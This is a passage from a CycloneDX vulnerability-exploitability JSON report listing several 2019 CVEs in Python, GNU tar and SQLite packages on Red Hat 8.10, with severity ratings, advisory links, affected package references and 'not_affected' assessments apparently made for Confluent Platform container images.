          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/file-libs@5.33-27.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable.\nFor python:"
      }
    },
    {
      "id": "CVE-2019-9674",
      "ratings": [
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Lib/zipfile.py in Python through 3.7.2 allows remote attackers to cause a denial of service (resource consumption) via a ZIP bomb.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9674"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00003.html"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00041.html"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9674"
        },
        {
          "url": "https://bugs.python.org/issue36260"
        },
        {
          "url": "https://bugs.python.org/issue36462"
        },
        {
          "url": "https://github.com/python/cpython/blob/master/Lib/zipfile.py"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9674"
        },
        {
          "url": "https://python-security.readthedocs.io/security.html#archives-and-zip-bomb"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20200221-0003/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4428-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4754-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6891-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7212-1"
        },
        {
          "url": "https://usn.ubuntu.com/4428-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9674"
        },
        {
          "url": "https://www.python.org/news/security/"
        }
      ],
      "published": "2020-02-04T15:15:11+00:00",
      "updated": "2026-06-17T02:44:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2019-9923",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "pax_decode_header in sparse.c in GNU Tar before 1.32 had a NULL pointer dereference when parsing certain archives that have malformed extended headers.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9923"
        },
        {
          "url": "http://git.savannah.gnu.org/cgit/tar.git/commit/?id=cb07844454d8cc9fb21f53ace75975f91185a120"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00077.html"
        },
        {
          "url": "http://savannah.gnu.org/bugs/?55369"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9923"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/tar/+bug/1810241"
        },
        {
          "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9923"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4692-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9923"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-9936",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "In SQLite 3.27.2, running fts5 prefix queries inside a transaction could trigger a heap-based buffer over-read in fts5HashEntrySort in sqlite3.c, which may lead to an information leak. This is related to ext/fts5/fts5_hash.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9936"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00026.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107562"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9936"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00037.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXD2GYJVTDGEQPUNMMMC5TB7MQXOBBMO/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N66U5PY5UJU4XBFZJH7QNKIDNAVIB4OP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9936"
        },
        {
          "url": "https://security.gentoo.org/glsa/201908-09"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190416-0005/"
        },
        {
          "url": "https://sqlite.org/src/info/b3fa58dd7403dbd4"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4019-1"
        },
        {
          "url": "https://usn.ubuntu.com/4019-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9936"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114382.html"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114394.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
        },
        {
          "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2019-9937",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In SQLite 3.27.2, interleaving reads and writes in a single transaction with an fts5 virtual table will lead to a NULL Pointer Dereference in fts5ChunkIterate in sqlite3.c. This is related to ext/fts5/fts5_hash.c and ext/fts5/fts5_index.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2019-9937"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00026.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/107562"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2019-9937"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00037.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXD2GYJVTDGEQPUNMMMC5TB7MQXOBBMO/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/N66U5PY5UJU4XBFZJH7QNKIDNAVIB4OP/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9937"
        },
        {
          "url": "https://security.gentoo.org/glsa/201908-09"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190416-0005/"
        },
        {
          "url": "https://sqlite.org/src/info/45c73deb440496e8"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-4019-1"
        },
        {
          "url": "https://usn.ubuntu.com/4019-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2019-9937"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114383.html"
        },
        {
          "url": "https://www.mail-archive.com/sqlite-users@mailinglists.sqlite.org/msg114393.html"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpujan2020.html"
        },
        {
          "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html"
        }
      ],
      "published": "2019-03-22T08:29:00+00:00",
      "updated": "2026-06-17T02:44:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.26.0-20.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/sqlite-libs@3.26.0-20.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
